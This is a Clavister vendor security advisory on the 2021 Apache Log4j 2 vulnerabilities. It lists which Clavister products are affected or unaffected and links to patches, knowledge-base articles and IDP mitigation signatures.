CLAV-SA-0297 High Severity vulnerability in Apache Log4J 2Back to list
|Summary||High Severity vulnerability in Apache Log4J 2|
Log4j 2 is used in Clavisters EasyAccess, EasyPassword and InCenter products and must be reconfigured/patched to not be susceptible to these vulnerabilities.
Log4j’s JNDI support has not restricted what names could be resolved. Some protocols are unsafe or can allow remote code execution.
For detailed information please see https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44228
Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations.
For detailed information please see https://logging.apache.org/log4j/2.x/security.html#CVE-2021-45046
Apache Log4j2 does not always protect from infinite recursion in lookup evaluation.
For detailed information please see https://logging.apache.org/log4j/2.x/security.html#CVE-2021-45105
Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker controls configuration.
For detailed information please see https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44832
- EasyAccess <= 4.1.2
- InCenter <= 1.68.03, 2.0.0 and 2.1.0
The following products does not use any Java components at all and are therefore (and have never been) vulnerable to these Log4j 2 vulnerabilities.
- Clavister NetWall (cOS Core)
- Clavister NetShield (cOS Stream)
- Clavister InControl
- Clavister OneConnect
Clavister IDP can be used to mitigate these attacks on non-encrypted traffic, please see https://www.clavister.com/advisories/idp/?Query=CVE-2021-44228 for details regarding what signatures to use. See https://kb.clavister.com/343410414/protecting-against-the-apache-log4j-exploit for detailed information.
For EasyAccess please refer to https://kb.clavister.com/343410234/high-severity-vulnerability-in-apache-log4j-2 for detailed information.
For InCenter please refer to https://kb.clavister.com/343410462/vulnerability-in-apache-log4j-2-which-is-used-in-incenter for detailed information.
Updated versions will be available from https://www.clavister.com/ as soon as they are available.
We are continously updating this advisory as more information gets available!